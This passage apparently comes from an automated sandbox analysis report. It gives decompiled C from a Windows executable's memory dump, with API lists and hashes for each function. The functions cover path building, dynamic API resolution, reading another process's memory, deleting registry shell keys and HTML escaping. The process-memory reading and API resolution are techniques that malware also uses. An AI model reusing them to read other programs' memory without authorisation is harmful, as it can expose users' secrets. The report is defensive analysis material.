                                                                                                                								wcscpy(__edi, __esi);
                                                                                                                							} else {
                                                                                                                								_v528 = 0;
                                                                                                                								memset( &_v526, 0, 0x208);
                                                                                                                								E00404C08( &_v528);
                                                                                                                								memcpy(__edi,  &_v528, 4);
                                                                                                                								__edi[1] = __edi[1] & 0x00000000;
                                                                                                                								wcscat(__edi, __esi);
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_v528 = 0;
                                                                                                                							memset( &_v526, 0, 0x208);
                                                                                                                							E00404C08( &_v528);
                                                                                                                							wcscpy(__edi,  &_v528);
                                                                                                                							wcscat(__edi, __esi + 0x16 + _t40 * 2);
                                                                                                                						}
                                                                                                                						L11:
                                                                                                                						return _t50;
                                                                                                                					}
                                                                                                                					_push( &(_t17[0]));
                                                                                                                					L4:
                                                                                                                					wcscpy(_t50, ??);
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_push(__esi);
                                                                                                                				goto L4;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • wcschr.MSVCRT ref: 00409223
                                                                                                                • wcscpy.MSVCRT ref: 00409233
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 0040489C
                                                                                                                  • Part of subcall function 0040488D: wcslen.MSVCRT ref: 004048A6
                                                                                                                  • Part of subcall function 0040488D: _memicmp.MSVCRT ref: 004048C1
                                                                                                                • wcscpy.MSVCRT ref: 00409282
                                                                                                                • wcscat.MSVCRT ref: 0040928D
                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				_Unknown_base(*)()* _v12;
                                                                                                                				char* _v16;
                                                                                                                				int _v18;
                                                                                                                				signed int _v20;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr* _t21;
                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                				signed int _t23;
                                                                                                                				signed int _t24;
                                                                                                                				_Unknown_base(*)()* _t26;
                                                                                                                				char* _t28;
                                                                                                                				int _t31;
                                                                                                                
                                                                                                                				_t21 = _a4;
                                                                                                                				if( *_t21 == 0) {
                                                                                                                					_t22 = GetModuleHandleW(L"kernel32.dll");
                                                                                                                					_v8 = _t22;
                                                                                                                					_t23 = GetProcAddress(_t22, "GetProcAddress");
                                                                                                                					 *_a4 = _t23;
                                                                                                                					_t24 = _t23 ^ _v8;
                                                                                                                					if((_t24 & 0xfff00000) != 0) {
                                                                                                                						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
                                                                                                                						_v20 = _v20 & 0x00000000;
                                                                                                                						_v12 = _t26;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosw");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsd");
                                                                                                                						asm("movsw");
                                                                                                                						_t28 =  &_v36;
                                                                                                                						asm("movsb");
                                                                                                                						_v16 = _t28;
                                                                                                                						_v20 = strlen(_t28);
                                                                                                                						_t31 = strlen( &_v36);
                                                                                                                						_v18 = _t31;
                                                                                                                						_t24 = _v12(_v8,  &_v20, 0, _a4);
                                                                                                                					}
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				return _t21;
                                                                                                                			}


                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
                                                                                                                				long _v8;
                                                                                                                				int _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				int _v20;
                                                                                                                				int _v24;
                                                                                                                				char _v28;
                                                                                                                				void _v538;
                                                                                                                				char _v540;
                                                                                                                				int _v548;
                                                                                                                				char _v564;
                                                                                                                				char _v22292;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* _t37;
                                                                                                                				void* _t48;
                                                                                                                				void* _t56;
                                                                                                                				signed int _t57;
                                                                                                                				void* _t67;
                                                                                                                				long _t69;
                                                                                                                				void* _t70;
                                                                                                                				void* _t72;
                                                                                                                				void* _t74;
                                                                                                                				void* _t76;
                                                                                                                
                                                                                                                				_t67 = __edx;
                                                                                                                				E0040B550(0x5714, __ecx);
                                                                                                                				_t37 = OpenProcess(0x10, 0, _a16);
                                                                                                                				_t82 = _t37;
                                                                                                                				_a16 = _t37;
                                                                                                                				if(_t37 == 0) {
                                                                                                                					_t69 = GetLastError();
                                                                                                                				} else {
                                                                                                                					_t72 =  &_v22292;
                                                                                                                					E0040171F(_t72, _t82);
                                                                                                                					_v8 = 0;
                                                                                                                					if(ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8) == 0) {
                                                                                                                						_t69 = GetLastError();
                                                                                                                					} else {
                                                                                                                						_t48 = E00405642( &_v564);
                                                                                                                						_t74 = _v548;
                                                                                                                						_t70 = _t48;
                                                                                                                						_a12 = _t74;
                                                                                                                						_v540 = 0;
                                                                                                                						memset( &_v538, 0, 0x1fe);
                                                                                                                						asm("cdq");
                                                                                                                						_push(_t67);
                                                                                                                						_push(_t74);
                                                                                                                						_push(_t70);
                                                                                                                						_push(L"%d  %I64x");
                                                                                                                						_push(0xff);
                                                                                                                						_push( &_v540);
                                                                                                                						L0040B1EC();
                                                                                                                						_v548 = 0;
                                                                                                                						E004055D1( &_v540,  &_v564);
                                                                                                                						_t16 = _t70 + 0xa; // 0xa
                                                                                                                						_t68 = _t16;
                                                                                                                						_v24 = 0;
                                                                                                                						_v12 = 0;
                                                                                                                						_v20 = 0;
                                                                                                                						_v16 = 0x100;
                                                                                                                						_v28 = 0;
                                                                                                                						E0040559A( &_v28, _t16);
                                                                                                                						_t76 = _v12;
                                                                                                                						_t56 = 0x40c4e8;
                                                                                                                						if(_t76 != 0) {
                                                                                                                							_t56 = _t76;
                                                                                                                						}
                                                                                                                						_t26 = _t70 + 2; // 0x2
                                                                                                                						_t66 = _t70 + _t26;
                                                                                                                						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8);
                                                                                                                						_t85 = _t76;
                                                                                                                						if(_t76 == 0) {
                                                                                                                							_t76 = 0x40c4e8;
                                                                                                                						}
                                                                                                                						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
                                                                                                                						_t69 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292);
                                                                                                                						E004055D1(_t61,  &_v28);
                                                                                                                					}
                                                                                                                					E004055D1(CloseHandle(_a16),  &_v564);
                                                                                                                				}
                                                                                                                				return _t69;
                                                                                                                			}

                                                                                                                0x00401bd7
                                                                                                                0x00401bee
                                                                                                                0x00401bf0
                                                                                                                0x00401bf0
                                                                                                                0x00401c0e
                                                                                                                0x00401c0e
                                                                                                                0x00401c23

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
                                                                                                                • ReadProcessMemory.KERNEL32(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
                                                                                                                • memset.MSVCRT ref: 00401B4A
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
                                                                                                                • _snwprintf.MSVCRT ref: 00401B69
                                                                                                                  • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                                  • Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
                                                                                                                • CloseHandle.KERNEL32(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
                                                                                                                • GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Process$ErrorLastMemoryReadfree$CloseHandleOpen_snwprintfmemset
                                                                                                                • String ID: %d %I64x
                                                                                                                • API String ID: 2567117392-2565891505
                                                                                                                • Opcode ID: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
                                                                                                                • Opcode Fuzzy Hash: 5737760d75e23d64ab9fab178ee98ead68544078704ee144899d5a68802ac3f7
                                                                                                                • Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				void* _v8;
                                                                                                                				void _v2054;
                                                                                                                				short _v2056;
                                                                                                                				void _v4102;
                                                                                                                				short _v4104;
                                                                                                                				signed int _t28;
                                                                                                                				void* _t34;
                                                                                                                
                                                                                                                				E0040B550(0x1004, __ecx);
                                                                                                                				_t36 = 0;
                                                                                                                				if(E004043F8( &_v8, 0x2001f) == 0) {
                                                                                                                					_v2056 = 0;
                                                                                                                					memset( &_v2054, 0, 0x7fe);
                                                                                                                					_v4104 = 0;
                                                                                                                					memset( &_v4102, 0, 0x7fe);
                                                                                                                					_t34 = __ebx + 0x20a;
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s\\command");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v2056);
                                                                                                                					L0040B1EC();
                                                                                                                					_push(_t34);
                                                                                                                					_push(__ebx);
                                                                                                                					_push(L"%s\\shell\\%s");
                                                                                                                					_push(0x3ff);
                                                                                                                					_push( &_v4104);
                                                                                                                					L0040B1EC();
                                                                                                                					RegDeleteKeyW(_v8,  &_v2056);
                                                                                                                					_t28 = RegDeleteKeyW(_v8,  &_v4104);
                                                                                                                					asm("sbb esi, esi");
                                                                                                                					_t36 =  ~_t28 + 1;
                                                                                                                					RegCloseKey(_v8);
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				char _v12;
                                                                                                                				struct HWND__* _t6;
                                                                                                                				_Unknown_base(*)()* _t11;
                                                                                                                				struct HWND__* _t15;
                                                                                                                				void* _t20;
                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                
                                                                                                                				_v12 = 8;
                                                                                                                				_v8 = 0xff;
                                                                                                                				_t15 = 0;
                                                                                                                				_t20 = 0;
                                                                                                                				_t23 = LoadLibraryW(L"comctl32.dll");
                                                                                                                				if(_t23 == 0) {
                                                                                                                					L5:
                                                                                                                					__imp__#17();
                                                                                                                					_t6 = 1;
                                                                                                                					L6:
                                                                                                                					if(_t6 != 0) {
                                                                                                                						return 1;
                                                                                                                					} else {
                                                                                                                						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
                                                                                                                						return 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
                                                                                                                				if(_t11 != 0) {
                                                                                                                					_t20 = 1;
                                                                                                                					_t15 =  *_t11( &_v12);
                                                                                                                				}
                                                                                                                				FreeLibrary(_t23);
                                                                                                                				if(_t20 == 0) {
                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t6 = _t15;
                                                                                                                					goto L6;
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
                                                                                                                				struct HWND__* _v8;
                                                                                                                				struct HWND__* _v12;
                                                                                                                				struct tagRECT _v28;
                                                                                                                				struct tagRECT _v44;
                                                                                                                				int _t50;
                                                                                                                				long _t61;
                                                                                                                				struct HDC__* _t63;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr _t68;
                                                                                                                				struct HWND__* _t71;
                                                                                                                				intOrPtr _t72;
                                                                                                                				void* _t73;
                                                                                                                				int _t74;
                                                                                                                				int _t80;
                                                                                                                				int _t83;
                                                                                                                
                                                                                                                				_t73 = __edx;
                                                                                                                				_v8 = 0;
                                                                                                                				_v12 = 0;
                                                                                                                				_t74 = GetSystemMetrics(0x11);
                                                                                                                				_t80 = GetSystemMetrics(0x10);
                                                                                                                				if(_t74 == 0 || _t80 == 0) {
                                                                                                                					_t63 = GetDC(0);
                                                                                                                					_t80 = GetDeviceCaps(_t63, 8);
                                                                                                                					_t74 = GetDeviceCaps(_t63, 0xa);
                                                                                                                					ReleaseDC(0, _t63);
                                                                                                                				}
                                                                                                                				GetWindowRect(_a4,  &_v44);
                                                                                                                				if((_a8 & 0x00000004) != 0) {
                                                                                                                					_t71 = GetParent(_a4);
                                                                                                                					if(_t71 != 0) {
                                                                                                                						_v28.left = _v28.left & 0x00000000;
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						asm("stosd");
                                                                                                                						GetWindowRect(_t71,  &_v28);
                                                                                                                						_t61 = _v28.left;
                                                                                                                						_t72 = _v28.top;
                                                                                                                						_t80 = _v28.right - _t61 + 1;
                                                                                                                						_t74 = _v28.bottom - _t72 + 1;
                                                                                                                						_v8 = _t61;
                                                                                                                						_v12 = _t72;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t65 = _v44.right;
                                                                                                                				if((_a8 & 0x00000001) == 0) {
                                                                                                                					asm("cdq");
                                                                                                                					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
                                                                                                                				} else {
                                                                                                                					_t83 = 0;
                                                                                                                				}
                                                                                                                				_t68 = _v44.bottom;
                                                                                                                				if((_a8 & 0x00000002) != 0) {
                                                                                                                					L11:
                                                                                                                					_t50 = 0;
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					asm("cdq");
                                                                                                                					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
                                                                                                                					if(_t50 >= 0) {
                                                                                                                						L12:
                                                                                                                						if(_t83 < 0) {
                                                                                                                							_t83 = 0;
                                                                                                                						}
                                                                                                                						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
                                                                                                                					}
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
                                                                                                                				void* __esi;
                                                                                                                				void* _t3;
                                                                                                                				int _t6;
                                                                                                                
                                                                                                                				_t3 = E00404AAA(_a4);
                                                                                                                				if(_t3 != 0) {
                                                                                                                					wcscpy(0x40fb90, _a4);
                                                                                                                					wcscpy(0x40fda0, L"general");
                                                                                                                					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
                                                                                                                					asm("sbb eax, eax");
                                                                                                                					 *0x40fe28 =  ~(_t6 - 1) + 1;
                                                                                                                					E00405F14(0x40fe30, L"charset", 0x3f);
                                                                                                                					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
                                                                                                                					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
                                                                                                                				}
                                                                                                                				return _t3;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
                                                                                                                				void* _t2;
                                                                                                                				signed short* _t3;
                                                                                                                				void* _t7;
                                                                                                                				void* _t8;
                                                                                                                				void* _t10;
                                                                                                                
                                                                                                                				_t3 = __eax;
                                                                                                                				_t8 = __ecx;
                                                                                                                				_t7 = 8;
                                                                                                                				while(1) {
                                                                                                                					_t2 =  *_t3 & 0x0000ffff;
                                                                                                                					if(_t2 != 0x3c) {
                                                                                                                						goto L3;
                                                                                                                					}
                                                                                                                					_push(_t7);
                                                                                                                					_push(L"&lt;");
                                                                                                                					L14:
                                                                                                                					_t2 = memcpy(_t8, ??, ??);
                                                                                                                					_t10 = _t10 + 0xc;
                                                                                                                					_t8 = _t8 + _t7;
                                                                                                                					L16:
                                                                                                                					if( *_t3 != 0) {
                                                                                                                						_t3 =  &(_t3[1]);
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					return _t2;
                                                                                                                					L3:
                                                                                                                					if(_t2 != 0x3e) {
                                                                                                                						if(_t2 != 0x22) {
                                                                                                                							if((_t2 & 0x0000ffff) != 0xffffffb0) {
                                                                                                                								if(_t2 != 0x26) {
                                                                                                                									if(_t2 != 0xa) {
                                                                                                                										 *_t8 = _t2;
                                                                                                                										_t8 = _t8 + 2;
                                                                                                                									} else {
                                                                                                                										_push(_t7);
                                                                                                                										_push(L"<br>");
                                                                                                                										goto L14;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									_push(0xa);
                                                                                                                									_push(L"&amp;");
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								_push(0xa);
                                                                                                                								_push(L"&deg;");
                                                                                                                								L11:
                                                                                                                								_t2 = memcpy(_t8, ??, ??);
                                                                                                                								_t10 = _t10 + 0xc;
                                                                                                                								_t8 = _t8 + 0xa;
                                                                                                                							}
                                                                                                                						} else {
                                                                                                                							_t2 = memcpy(_t8, L"&quot;", 0xc);
                                                                                                                							_t10 = _t10 + 0xc;
                                                                                                                							_t8 = _t8 + 0xc;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_push(_t7);
                                                                                                                						_push(L"&gt;");
                                                                                                                						goto L14;
                                                                                                                					}
                                                                                                                					goto L16;
                                                                                                                				}
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.684651909.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.684642577.0000000000400000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684696983.000000000040C000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684749472.000000000040F000.00000004.00020000.sdmp
                                                                                                                • Associated: 00000003.00000002.684768081.000000000041D000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
